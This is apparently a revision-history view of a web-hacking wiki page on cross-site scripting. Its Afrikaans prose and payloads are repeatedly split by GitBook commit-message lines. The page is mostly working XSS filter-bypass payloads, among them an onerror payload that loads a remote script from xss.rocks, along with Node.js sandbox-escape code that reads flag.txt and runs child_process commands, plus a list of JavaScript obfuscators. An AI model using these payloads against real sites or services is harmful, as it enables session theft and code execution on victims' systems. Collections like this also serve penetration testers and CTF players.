 								top['alert'](3)
 								this['alert'](4)
 								frames['alert'](5)
 								content['alert'](6)
 								[7].map(alert)
 								[8].find(alert)
 								[9].every(alert)
 								[10].filter(alert)
 								[11].findIndex(alert)
 								[12].forEach(alert);
 								top[/al/.source+/ert/.source](1)
 								top[8680439..toString(30)](1)
 								Function("ale"+"rt(1)")();
 								new Function`al\ert\`6\``;
 								Set.constructor('ale'+'rt(13)')();
 								Set.constructor`al\x65rt\x2814\x29```;
 								$='e'; x='ev'+'al'; x=this[x]; y='al'+$+'rt(1)'; y=x(y); x(y)
 								x='ev'+'al'; x=this[x]; y='ale'+'rt(1)'; x(x(y))
 								this[[]+('eva')+(/x/,new Array)+'l'](/xxx.xxx.xxx.xxx.xx/+alert(1),new Array)
-												GitBook: [master] 2 pages modified
											
										
										
											2021-02-25 11:39:28 +00:00
+								globalThis[`al`+/ert/.source]`1`
 								this[`al`+/ert/.source]`1`
 								[alert][0].call(this,1)
 								window['a'+'l'+'e'+'r'+'t']()
 								window['a'+'l'+'e'+'r'+'t'].call(this,1)
 								top['a'+'l'+'e'+'r'+'t'].apply(this,[1])
 								(1,2,3,4,5,6,7,8,alert)(1)
 								x=alert,x(1)
 								[1].find(alert)
 								top["al"+"ert"](1)
 								top[/al/.source+/ert/.source](1)
 								al\u0065rt(1)
 								al\u0065rt`1`
 								top['al\145rt'](1)
 								top['al\x65rt'](1)
 								top[8680439..toString(30)](1)
-												GitBook: [master] one page modified
											
										
										
											2021-06-02 22:22:26 +00:00
+								<svg><animate onbegin=alert() attributeName=x></svg>
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								````
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								## **DOM kwesbaarhede**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								Daar is **JS-kode** wat **onveilig deur 'n aanvaller beheerde data** gebruik soos `location.href`. 'n Aanvaller kan dit misbruik om willekeurige JS-kode uit te voer.\
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								**As gevolg van die uitbreiding van die verduideliking van** [**DOM kwesbaarhede is dit na hierdie bladsy verskuif**](dom-xss.md)**:**
-												GitBook: [master] 472 pages modified
											
										
										
											2021-05-27 11:59:23 +00:00
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								{% content-ref url="dom-xss.md" %}
 								[dom-xss.md](dom-xss.md)
 								{% endcontent-ref %}
-												GitBook: [master] 472 pages modified
											
										
										
											2021-05-27 11:59:23 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								Daar sal jy 'n gedetailleerde **verduideliking van wat DOM kwesbaarhede is, hoe hulle uitgelok word, en hoe om hulle te benut** vind.\
 								Moenie ook vergeet dat **aan die einde van die genoemde pos** jy 'n verduideliking oor [**DOM Clobbering aanvalle**](dom-xss.md#dom-clobbering) kan vind.
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								## Ander Oorskrydings
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								### Gestandaardiseerde Unicode
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								Jy kan nagaan of die **weerspieëlde waardes** op die bediener (of aan die kliëntkant) **unicode genormaliseer** word en hierdie funksionaliteit misbruik om beskermings te omseil. [**Vind 'n voorbeeld hier**](../unicode-injection/#xss-cross-site-scripting).
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								### PHP FILTER\_VALIDATE\_EMAIL vlag Oorskryding
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```javascript
 								"><svg/onload=confirm(1)>"@x.y
 								```
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								### Ruby-On-Rails omseil
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								As gevolg van **RoR mass assignment** word aanhalings in die HTML ingevoeg en dan word die aanhalingsbeperking omseil en addisionele velde (onfocus) kan binne die tag bygevoeg word.\
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								Vormvoorbeeld ([van hierdie verslag](https://hackerone.com/reports/709336)), as jy die lading stuur:
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								```
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								contact[email] onfocus=javascript:alert('xss') autofocus a=a&form_type[a]aaa
 								```
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								Die paar "Key","Value" sal soos volg teruggevoer word:
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								```
 								{" onfocus=javascript:alert(&#39;xss&#39;) autofocus a"=>"a"}
 								```
 								### Spesiale kombinasies
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```markup
 								<iframe/src="data:text/html,<svg onload=alert(1)>">
 								<input type=image src onerror="prompt(1)">
 								<svg onload=alert(1)//
 								<img src="/" =_=" title="onerror='prompt(1)'">
 								<img src='1' onerror='alert(0)' <
 								<script x> alert(1) </script 1=2
 								<script x>alert('XSS')<script y>
 								<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-06-02 16:32:07 +00:00
+								<svg////////onload=alert(1)>
 								<svg id=x;onload=alert(1)>
 								<svg id=`x`onload=alert(1)>
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								<img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
 								<script>$=1,alert($)</script>
 								<script ~~~>confirm(1)</script ~~~>
 								<script>$=1,\u0061lert($)</script>
 								<</script/script><script>eval('\\u'+'0061'+'lert(1)')//</script>
 								<</script/script><script ~~~>\u0061lert(1)</script ~~~>
 								</style></scRipt><scRipt>alert(1)</scRipt>
 								<img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)>
 								<svg><x><script>alert('1'&#41</x>
 								<iframe src=""/srcdoc='<svg onload=alert(1)>'>
-												GitBook: [master] one page modified
											
										
										
											2021-06-02 22:22:26 +00:00
+								<svg><animate onbegin=alert() attributeName=x></svg>
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								<img/id="alert('XSS')\"/alt=\"/\"src=\"/\"onerror=eval(id)>
-												Completed payload

Location: Line 896
Change: Added > to complete payload

`<img src=1 onerror="s=document.createElement('script');s.src='http://xss.rocks/xss.js';document.body.appendChild(s);">`
											
										
										
											2023-05-03 17:27:46 +00:00
+								<img src=1 onerror="s=document.createElement('script');s.src='http://xss.rocks/xss.js';document.body.appendChild(s);">
-												GITBOOK-4132: change request with no subject merged in GitBook

											
										
										
											2023-10-16 21:06:07 +00:00
+								(function(x){this[x+`ert`](1)})`al`
 								window[`al`+/e/[`ex`+`ec`]`e`+`rt`](2)
 								document['default'+'View'][`\u0061lert`](3)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								### XSS met koptekstinjeksie in 'n 302-antwoord
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								As jy vind dat jy **koptekste kan inspuit in 'n 302 Herlei-antwoord** kan jy probeer om die browser **willekeurige JavaScript te laat uitvoer**. Dit is **nie eenvoudig nie** aangesien moderne webblaaier nie die HTTP-antwoordliggaam interpreteer as die HTTP-antwoordstatuskode 'n 302 is nie, dus is net 'n kruissite-skripsing-lading nutteloos.
-												GitBook: [master] one page modified
											
										
										
											2020-10-16 10:44:40 +00:00
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:45:55 +00:00
+								In [**hierdie verslag**](https://www.gremwell.com/firefox-xss-302) en [**hierdie een**](https://www.hahwul.com/2020/10/03/forcing-http-redirect-xss/) kan jy lees hoe jy verskeie protokolle binne die Ligging-koptekstuk kan toets en sien of enige van hulle die browser toelaat om die XSS-lading binne die liggaam te ondersoek en uit te voer.\
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								Voorheen bekende protokolle: `mailto://`, `//x:1/`, `ws://`, `wss://`, _leë Ligging-koptekstuk_, `resource://`.
-												GitBook: [master] one page modified
											
										
										
											2020-10-16 10:44:40 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								### Slegs Letters, Syfers en Kolletjies
-												GitBook: [master] one page modified
											
										
										
											2020-10-16 10:44:40 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								As jy die **terugroep** kan aandui wat javascript gaan **uitvoer** beperk tot daardie karakters. [**Lees hierdie afdeling van hierdie pos**](./#javascript-function) om te vind hoe om van hierdie gedrag misbruik te maak.
-												GitBook: [#3276] No subject

											
										
										
											2022-06-23 12:12:25 +00:00
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								### Geldige `<script>` Inhoudstipes vir XSS
-												GitBook: [#3276] No subject

											
										
										
											2022-06-23 12:12:25 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								(Van [**hier**](https://blog.huli.tw/2022/04/24/en/how-much-do-you-know-about-script-type/)) As jy probeer om 'n skrip te laai met 'n **inhoudstipe** soos `application/octet-stream`, sal Chrome die volgende fout gooi:
-												GitBook: [#3735] No subject

											
										
										
											2023-01-05 13:05:03 +00:00
 								> Refused to execute script from ‘[https://uploader.c.hc.lc/uploads/xxx'](https://uploader.c.hc.lc/uploads/xxx') because its MIME type (‘application/octet-stream’) is not executable, and strict MIME type checking is enabled.
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								Die enigste **Inhoudstipes** wat Chrome sal ondersteun om 'n **gelaai skrip** uit te voer is diegene binne die konstante **`kSupportedJavascriptTypes`** van [https://chromium.googlesource.com/chromium/src.git/+/refs/tags/103.0.5012.1/third\_party/blink/common/mime\_util/mime\_util.cc](https://chromium.googlesource.com/chromium/src.git/+/refs/tags/103.0.5012.1/third\_party/blink/common/mime\_util/mime\_util.cc)
-												GitBook: [#3735] No subject

											
										
										
											2023-01-05 13:05:03 +00:00
+								```c
 								const char* const kSupportedJavascriptTypes[] = {
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								"application/ecmascript",
 								"application/javascript",
 								"application/x-ecmascript",
 								"application/x-javascript",
 								"text/ecmascript",
 								"text/javascript",
 								"text/javascript1.0",
 								"text/javascript1.1",
 								"text/javascript1.2",
 								"text/javascript1.3",
 								"text/javascript1.4",
 								"text/javascript1.5",
 								"text/jscript",
 								"text/livescript",
 								"text/x-ecmascript",
 								"text/x-javascript",
-												GitBook: [#3735] No subject

											
										
										
											2023-01-05 13:05:03 +00:00
+								};
 								```
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								### Skripsie Tipes vir XSS
-												GitBook: [#3735] No subject

											
										
										
											2023-01-05 13:05:03 +00:00
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:45:55 +00:00
+								(Van [**hier**](https://blog.huli.tw/2022/04/24/en/how-much-do-you-know-about-script-type/)) So, watter tipes kan aangedui word om 'n skripsie te laai?
-												GitBook: [#3735] No subject

											
										
										
											2023-01-05 13:05:03 +00:00
+								```html
 								<script type="???"></script>
 								```
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								Die antwoord is:
-												GitBook: [#3735] No subject

											
										
										
											2023-01-05 13:05:03 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								* **module** (standaard, niks om te verduidelik nie)
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								* [**webbundle**](https://web.dev/web-bundles/): Web Bundles is 'n funksie waar jy 'n klomp data (HTML, CSS, JS...) saam kan verpak in 'n **`.wbn`** lêer.
-												GitBook: [#3735] No subject

											
										
										
											2023-01-05 13:05:03 +00:00
+								```html
 								<script type="webbundle">
 								{
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								"source": "https://example.com/dir/subresources.wbn",
 								"resources": ["https://example.com/dir/a.js", "https://example.com/dir/b.js", "https://example.com/dir/c.png"]
-												GitBook: [#3735] No subject

											
										
										
											2023-01-05 13:05:03 +00:00
+								}
 								</script>
 								The resources are loaded from the source .wbn, not accessed via HTTP
 								```
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								* [**importmap**](https://github.com/WICG/import-maps)**:** Laat toe om die invoer sintaksis te verbeter
-												GitBook: [#3735] No subject

											
										
										
											2023-01-05 13:05:03 +00:00
+								```html
 								<script type="importmap">
 								{
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								"imports": {
 								"moment": "/node_modules/moment/src/moment.js",
 								"lodash": "/node_modules/lodash-es/lodash.js"
 								}
-												GitBook: [#3735] No subject

											
										
										
											2023-01-05 13:05:03 +00:00
+								}
 								</script>
 								<!-- With importmap you can do the following -->
 								<script>
 								import moment from "moment";
 								import { partition } from "lodash";
 								</script>
 								```
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								Hierdie gedrag is gebruik in [**hierdie skryfstuk**](https://github.com/zwade/yaca/tree/master/solution) om 'n biblioteek te herken as eval om dit te misbruik en XSS te veroorsaak.
-												GitBook: [#3735] No subject

											
										
										
											2023-01-05 13:05:03 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								* [**speculationrules**](https://github.com/WICG/nav-speculation)**:** Hierdie funksie is hoofsaaklik om sekere probleme veroorsaak deur vooraf-rendering op te los. Dit werk soos volg:
-												GitBook: [#3735] No subject

											
										
										
											2023-01-05 13:05:03 +00:00
+								```html
 								<script type="speculationrules">
 								{
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								"prerender": [
 								{"source": "list",
 								"urls": ["/page/2"],
 								"score": 0.5},
 								{"source": "document",
 								"if_href_matches": ["https://*.wikipedia.org/**"],
 								"if_not_selector_matches": [".restricted-section *"],
 								"score": 0.1}
 								]
-												GitBook: [#3735] No subject

											
										
										
											2023-01-05 13:05:03 +00:00
+								}
 								</script>
 								```
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:45:55 +00:00
+								### Web Inhoudstipes vir XSS
-												GitBook: [#3735] No subject

											
										
										
											2023-01-05 13:05:03 +00:00
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:45:55 +00:00
+								(Van [**hier**](https://blog.huli.tw/2022/04/24/en/how-much-do-you-know-about-script-type/)) Die volgende inhoudstipes kan XSS uitvoer in alle webblaaier:
-												GitBook: [#3735] No subject

											
										
										
											2023-01-05 13:05:03 +00:00
 								* text/html
 								* application/xhtml+xml
 								* application/xml
 								* text/xml
 								* image/svg+xml
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								* text/plain (?? nie op die lys nie, maar ek dink ek het dit gesien in 'n CTF)
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								* application/rss+xml (af)
 								* application/atom+xml (af)
-												GitBook: [#3735] No subject

											
										
										
											2023-01-05 13:05:03 +00:00
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:45:55 +00:00
+								In ander webblaaier kan ander **`Inhoudstipes`** gebruik word om willekeurige JS uit te voer, kyk: [https://github.com/BlackFan/content-type-research/blob/master/XSS.md](https://github.com/BlackFan/content-type-research/blob/master/XSS.md)
-												GitBook: [#3735] No subject

											
										
										
											2023-01-05 13:05:03 +00:00
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:45:55 +00:00
+								### xml Inhoudstipe
-												GITBOOK-3804: No subject

											
										
										
											2023-03-03 17:26:17 +00:00
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:45:55 +00:00
+								As die bladsy 'n text/xml inhoudstipe teruggee, is dit moontlik om 'n namespace aan te dui en willekeurige JS uit te voer:
-												GITBOOK-3804: No subject

											
										
										
											2023-03-03 17:26:17 +00:00
+								```xml
 								<xml>
 								<text>hello<img src="1" onerror="alert(1)" xmlns="http://www.w3.org/1999/xhtml" /></text>
 								</xml>
 								<!-- Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (p. 113). Kindle Edition. -->
 								```
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								### Spesiale Vervangingspatrone
-												GITBOOK-3804: No subject

											
										
										
											2023-03-03 17:26:17 +00:00
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:45:55 +00:00
+								Wanneer iets soos **`"some {{template}} data".replace("{{template}}", <user_input>)`** gebruik word. Die aanvaller kan [**spesiale stringvervanginge**](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global\_Objects/String/replace#specifying\_a\_string\_as\_the\_replacement) gebruik om te probeer om sekere beskermings te omseil: ``"123 {{template}} 456".replace("{{template}}", JSON.stringify({"name": "$'$`alert(1)//"}))``
-												GitBook: [#3735] No subject

											
										
										
											2023-01-05 13:05:03 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								Byvoorbeeld in [**hierdie skryfstuk**](https://gitea.nitowa.xyz/nitowa/PlaidCTF-YACA), is dit gebruik om 'n JSON-string binne 'n skripsie te **ontsnapping** en arbitrêre kode uit te voer.
-												GitBook: [#3735] No subject

											
										
										
											2023-01-05 13:05:03 +00:00
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								### Chrome Cache na XSS
-												GitBook: [#3749] No subject

											
										
										
											2023-01-13 17:40:30 +00:00
-												GITBOOK-4028: change request with no subject merged in GitBook

											
										
										
											2023-08-08 08:05:16 +00:00
+								{% content-ref url="chrome-cache-to-xss.md" %}
 								[chrome-cache-to-xss.md](chrome-cache-to-xss.md)
 								{% endcontent-ref %}
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								### XS Jails Ontsnapping
-												GitBook: [#3313] No subject

											
										
										
											2022-07-10 22:26:52 +00:00
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								As jy slegs 'n beperkte stel karakters het om te gebruik, kyk na hierdie ander geldige oplossings vir XSJail-probleme:
-												GitBook: [#3313] No subject

											
										
										
											2022-07-10 22:26:52 +00:00
+								```javascript
 								// eval + unescape + regex
 								eval(unescape(/%2f%0athis%2econstructor%2econstructor(%22return(process%2emainModule%2erequire(%27fs%27)%2ereadFileSync(%27flag%2etxt%27,%27utf8%27))%22)%2f/))()
 								eval(unescape(1+/1,this%2evalueOf%2econstructor(%22process%2emainModule%2erequire(%27repl%27)%2estart()%22)()%2f/))
 								// use of with
 								with(console)log(123)
 								with(/console.log(1)/)with(this)with(constructor)constructor(source)()
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								// Just replace console.log(1) to the real code, the code we want to run is:
 								//return String(process.mainModule.require('fs').readFileSync('flag.txt'))
-												GitBook: [#3313] No subject

											
										
										
											2022-07-10 22:26:52 +00:00
 								with(process)with(mainModule)with(require('fs'))return(String(readFileSync('flag.txt')))
 								with(k='fs',n='flag.txt',process)with(mainModule)with(require(k))return(String(readFileSync(n)))
 								with(String)with(f=fromCharCode,k=f(102,115),n=f(102,108,97,103,46,116,120,116),process)with(mainModule)with(require(k))return(String(readFileSync(n)))
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								//Final solution
-												GitBook: [#3313] No subject

											
										
										
											2022-07-10 22:26:52 +00:00
+								with(
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								/with(String)
 								with(f=fromCharCode,k=f(102,115),n=f(102,108,97,103,46,116,120,116),process)
 								with(mainModule)
 								with(require(k))
 								return(String(readFileSync(n)))
 								/)
-												GitBook: [#3313] No subject

											
										
										
											2022-07-10 22:26:52 +00:00
+								with(this)
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								with(constructor)
 								constructor(source)()
-												GitBook: [#3313] No subject

											
										
										
											2022-07-10 22:26:52 +00:00
 								// For more uses of with go to challenge misc/CaaSio PSE in
 								// https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#misc/CaaSio%20PSE
 								```
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								Indien **alles ongedefinieerd is** voor die uitvoering van onbetroubare kode (soos in [**hierdie uiteensetting**](https://blog.huli.tw/2022/02/08/en/what-i-learned-from-dicectf-2022/#miscx2fundefined55-solves)), is dit moontlik om nuttige voorwerpe "uit niks" te genereer om die uitvoering van willekeurige onbetroubare kode te misbruik:
-												GitBook: [#3313] No subject

											
										
										
											2022-07-10 22:26:52 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								* Deur import()
-												GITBOOK-4028: change request with no subject merged in GitBook

											
										
										
											2023-08-08 08:05:16 +00:00
+								```javascript
 								// although import "fs" doesn’t work, import('fs') does.
 								import("fs").then(m=>console.log(m.readFileSync("/flag.txt", "utf8")))
 								```
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								* Toegang tot `require` op 'n indirekte manier
-												GITBOOK-4028: change request with no subject merged in GitBook

											
										
										
											2023-08-08 08:05:16 +00:00
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								[Volgens hierdie](https://stackoverflow.com/questions/28955047/why-does-a-module-level-return-statement-work-in-node-js/28955050#28955050) word modules deur Node.js binne 'n funksie gewikkel, soos hierdie:
-												GITBOOK-4028: change request with no subject merged in GitBook

											
										
										
											2023-08-08 08:05:16 +00:00
+								```javascript
 								(function (exports, require, module, __filename, __dirname) {
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								// our actual module code
-												GITBOOK-4028: change request with no subject merged in GitBook

											
										
										
											2023-08-08 08:05:16 +00:00
+								});
 								```
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								Daarom, as ons van daardie module **'n ander funksie kan aanroep**, is dit moontlik om `arguments.callee.caller.arguments[1]` van daardie funksie te gebruik om toegang te verkry tot **`require`**:
-												GITBOOK-4028: change request with no subject merged in GitBook

											
										
										
											2023-08-08 08:05:16 +00:00
 								{% code overflow="wrap" %}
 								```javascript
 								(function(){return arguments.callee.caller.arguments[1]("fs").readFileSync("/flag.txt", "utf8")})()
 								```
 								{% endcode %}
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								Op 'n soortgelyke manier as die vorige voorbeeld, is dit moontlik om **fouthanteraars te gebruik** om toegang te verkry tot die **omhulsel** van die module en die **`require`**-funksie te kry:
-												GITBOOK-4028: change request with no subject merged in GitBook

											
										
										
											2023-08-08 08:05:16 +00:00
+								```javascript
 								try {
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								null.f()
-												GITBOOK-4028: change request with no subject merged in GitBook

											
										
										
											2023-08-08 08:05:16 +00:00
+								} catch (e) {
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								TypeError = e.constructor
-												GITBOOK-4028: change request with no subject merged in GitBook

											
										
										
											2023-08-08 08:05:16 +00:00
+								}
 								Object = {}.constructor
 								String = ''.constructor
 								Error = TypeError.prototype.__proto__.constructor
 								function CustomError() {
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								const oldStackTrace = Error.prepareStackTrace
 								try {
 								Error.prepareStackTrace = (err, structuredStackTrace) => structuredStackTrace
 								Error.captureStackTrace(this)
 								this.stack
 								} finally {
 								Error.prepareStackTrace = oldStackTrace
 								}
-												GITBOOK-4028: change request with no subject merged in GitBook

											
										
										
											2023-08-08 08:05:16 +00:00
+								}
 								function trigger() {
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								const err = new CustomError()
 								console.log(err.stack[0])
 								for (const x of err.stack) {
 								// use x.getFunction() to get the upper function, which is the one that Node.js adds a wrapper to, and then use arugments to get the parameter
 								const fn = x.getFunction()
 								console.log(String(fn).slice(0, 200))
 								console.log(fn?.arguments)
 								console.log('='.repeat(40))
 								if ((args = fn?.arguments)?.length > 0) {
 								req = args[1]
 								console.log(req('child_process').execSync('id').toString())
 								}
 								}
-												GITBOOK-4028: change request with no subject merged in GitBook

											
										
										
											2023-08-08 08:05:16 +00:00
+								}
 								trigger()
 								```
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								### Verduistering & Gevorderde Oorspoor
-												GITBOOK-4028: change request with no subject merged in GitBook

											
										
										
											2023-08-08 08:05:16 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								* **Verskillende verduisterings op een bladsy:** [**https://aem1k.com/aurebesh.js/**](https://aem1k.com/aurebesh.js/)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								* [https://github.com/aemkei/katakana.js](https://github.com/aemkei/katakana.js)
-												GitBook: [#2982] No subject

											
										
										
											2022-02-02 15:35:20 +00:00
+								* [https://ooze.ninja/javascript/poisonjs](https://ooze.ninja/javascript/poisonjs)
 								* [https://javascriptobfuscator.herokuapp.com/](https://javascriptobfuscator.herokuapp.com)
 								* [https://skalman.github.io/UglifyJS-online/](https://skalman.github.io/UglifyJS-online/)
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								* [http://www.jsfuck.com/](http://www.jsfuck.com)
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								* Meer gesofistikeerde JSFuck: [https://medium.com/@Master\_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce](https://medium.com/@Master\_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								* [http://utf-8.jp/public/jjencode.html](http://utf-8.jp/public/jjencode.html)
-												GitBook: [master] 3 pages and 3 assets modified
											
										
										
											2021-05-27 11:24:11 +00:00
+								* [https://utf-8.jp/public/aaencode.html](https://utf-8.jp/public/aaencode.html)
-												GitBook: [#3501] No subject

											
										
										
											2022-09-23 09:06:24 +00:00
+								* [https://portswigger.net/research/the-seventh-way-to-call-a-javascript-function-without-parentheses](https://portswigger.net/research/the-seventh-way-to-call-a-javascript-function-without-parentheses)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```javascript
-												GitBook: [master] 3 pages and 3 assets modified
											
										
										
											2021-05-27 11:24:11 +00:00
+								//Katana
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								<script>([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()</script>
 								```
 								```javascript
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								//JJencode
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
